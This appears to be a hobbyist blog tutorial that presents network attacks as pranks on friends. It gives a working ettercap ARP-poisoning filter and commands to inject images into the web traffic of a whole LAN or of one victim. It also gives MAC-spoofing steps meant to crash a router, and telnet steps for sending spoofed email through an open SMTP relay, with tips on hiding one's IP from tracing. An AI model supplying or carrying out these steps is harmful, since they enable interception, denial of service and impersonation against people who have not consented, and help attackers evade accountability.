Practical jokes are a lot of fun to pull on friends. Lately, my tutorials have been more, well, how shall I say... malicious, self-serving, etc. Let's take it down a notch and discuss humorous way to trick/annoy your friends. But of course, this is all in gest. There are a few methods that I find worth while; such as the following.

  1. The ability to make all images on the victim's web browser some random image you choose.
  2. Disabling a wireless access point or router
  3. I send your e-mail.

The first method is probably my favorite. The way one does this is by acquiring a LiveCD of your favorite auditor, (such as Backtrack, PHLAK, etc) and booting it up. The program that we will be using (and yes, only one) will be ettercap. Ettercap is a program that uses ARP poisoning (ARP spoofing) to execute tasks, and may easily be expanded by other plugins, such as in our case, filters. But first, let's get a brief overview of what ARP poisoning is exactly. ARP poisoning, by definition; "is a technique used to attack an Ethernet network which may allow an attacker to sniff data frames on a local area network (LAN) or stop the traffic altogether (known as a denial of service attack)." (Wikipedia) In layman's terms, by spoofing Address Resolution Protocols (finding a devices hardware address; aka the MAC address) you can control the end user's packet routing, what happens to them, or what have you. In this case, we want to redirect the received packets elsewhere that are being retrieved by the HTTP client, and replace it with our "preferred" if you will, packets.

So let's get to the nitty gritty, fun/interesting part, instant gratification, whatever. As of now, we need to make our filter to help "redirect" all image files downloaded by our unsuspecting client. Now, keep in mind, this will not work on all websites since some sites compress them before you actually download all provided files. Now, we need to make our filter. Take the following code and place it in a file called haha.filter.

if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://www.leetupload.com/files/images/head.gif\" "); replace("IMG SRC=", "img src=\"http://www.leetupload.com/files/images/head.gif\" "); msg("Filter Executed.\n"); }

(Following filter was taken and slightly altered from Irongeek.com) Keep in mind, edit the prior script in any manor you please; such as, replacing the URL with your image. Now that we have our amazing little filter, let us apply it, shall we? Since binary programs for the most part cannot interpret coding such as C, or basic scripting, we need to compile it in a way that ettercap can understand it, send proper CPU calls, etc. Go ahead and open up a console to root and make sure that your main ethernet or wireless adapter is enabled. To do so, type: ifconfig, and see if everything appears to be in order before going any further. Next, let's go to the directory where we placed the haha.filter. Here are the direct steps to what we need to do after having connected to the network we wish to "mess" with.

  1. etterfilter haha.filter -o haha.ef (This command converts the script into binary)
  2. If we wish to effect all users on the given network, then we will execute the following: ettercap -T -q -F haha.ef -M ARP // // (The // // is the equivalent to doing a search *.* where the asterisks denote "any name or group of letters" goes here. Like this, ***.***.***.*** in terms of an IP address, just much neater with // // instead.
  3. Wait a bit for it to resolve all the IP's located on the network (remember, its not the best idea to run this command if you are on a large network, such as a campus. Its even a worse idea on a campus, you'll get your ass kicked out for sure, because yes, you are not untouchable...)
  4. If you wish to target a specific individual, you would type: ettercap -T -q -F haha.ef -M ARP /***.***.***.***/ // (The ***.***.***.*** represents precisely what internal IP address you wish to target).
  5. Now, your unsuspecting victim, erm, I mean, "friend" will be viewing the image you decided to filter over all other web page images. I'm sure he/she will love you for it, heh...

On to the next "joke." From recent experience, people do not find this technique to be much of a laugh as I do; but you know, to each his own. Not even a chuckle, how disappointing is that? Oh well. This can easily be interpreted as being purely malicious, but considering the context of this article, think again wise guy. We want to disable our friend's WAP/router. This partially ties in with the definition given earlier about what ARP is/does on a network. In the article before, I discussed a bit more about what a MAC address is, (no one MAC address being alike, etc.) Have you ever seen DHCP mess up before? Some times, in rare occasions, IP addresses are duplicated, which for blatant reasons creates quite a conflict. Windows for the most part will auto-disconnect if this happens, and flush the current assigned IP, and pull a new one from the supplied DHCP server. Well, this is somewhat similar to what we are going to do with the router/WAP, but a little more severe, and non-self-correcting. Each WAP/router have an assigned MAC address that supposedly is not the same as any other address on the network, having dueling addresses creates conflicts because it does not know which way to go. What we want to do is pull the MAC address from our WAP/router and duplicate it on our laptop/Desktop, thus causing the gateway to crash. These pieces of equipment for the most part are not too terribly bright in the sense that it cannot correct itself. Most end-user routers that you purchase at Best Buy, CompUSA, or any other national retailer will supply not heavy duty, high tech routers since common "folk" do not require such devices. Majority of routers that are posed with an identical MAC address to the router will usually crash and become inaccessible, thus killing all traffic. Time for the fun. Boot up your auditor CD, and make sure you have the aircrack-ng suite installed (most come with this, or the legacy series of the software).

  1. Pull up a console and make sure you have your wireless device up and running (I will be using wlan0 as my wireless device.) Type ifconfig to see what devices you have enabled. If the one you normally use is down, simply type: ifconfig device_name_here0 up. Then type: ifwconfig device_name_here0 mode monitor. This will allow us to pull all packets in.
  2. To be able to see what MAC address the router/WAP we want to mock, type: airodump-ng --ivs --write file_name_here --channel 11 wireless_device_here0
  3. A new window will appear and will show the BSSID (the WAP) and a MAC address that is in the same form as tis example MAC address: 00:11:22:33:44:55. Copy it, write it down, whatever.
  4. Close that console window and open a new one in root.
  5. ifconfig device_name_here0 down
  6. ifconfig device_name_here0 hw ether 00:11:22:33:44:55 (Replace the prior stated wih the given.)
  7. ifconfig device_name_here0 up
  8. Now, connect to the WAP that has the same MAC address as yours now. It should keep trying to acquire the address, and eventually fail. If all went well, the WAP should be down, yay!

The final prank for now will be the "I send your e-mail," a play on words to the popular bumper sticker, "I read your e-mail." Its actually a lot easier than you may think. We are going to boot into Windows (yes, ugh, telnet will have to do). Open up the command prompt and type: telnet. The way it works is that you need to be using a free SMTP relay server meaning it does not mind sending e-mail to other domains. In other cases, if you are sending an e-mail to, oh say, *@gmail.com, then you must connect to gmail.com. Let's get straight to business.

  1. o mail.freesmtpserver.com 25 (Explanation for the code: o = open, address = your SMTP server, or a free relay server, 25 = the official SMTP port, because if you don't specify it, ti will default to the telnet port, 23).
  2. You should wait and then get some sort of response such as 220, blah blah. 220 pretty much means accepted, OK. Now type: helo mail.freesmtpserver.com (helo is the SMTP "language" if you will, to state, um, yeah, hi, I am actually trying to start this session with you "mail.freesmtpserver.com." It should accept your gracious invitation and throw a not so creative helo gesture back at you.
  3. Let's specify who the e-mail is being sent from. mail from: n00b1@freesmtpserver.com
  4. Recipient follows... rcpt to: ultra_n00b2@someotheraddress.com
  5. Now to create the body, let your imagination go wild- but not too wild... Type: data
  6. Start typing your message.
  7. When done, hit enter, type a period, and hit enter again.
  8. Your message will now have been saved and then sent to ultra_n00b2@someotheraddress.com! Be sure to use privoxy or something along those lines since it is very easy to pull an IP address from the headers of the received e-mail your friend ultra_n00b2 received, and then ultimately trace back to you.

Remember that all of the actions stated prior may of course be used for more malicious purposes, but it relies on you, the user on how you wish to apply these methods. Stay tuned for my next tutorial!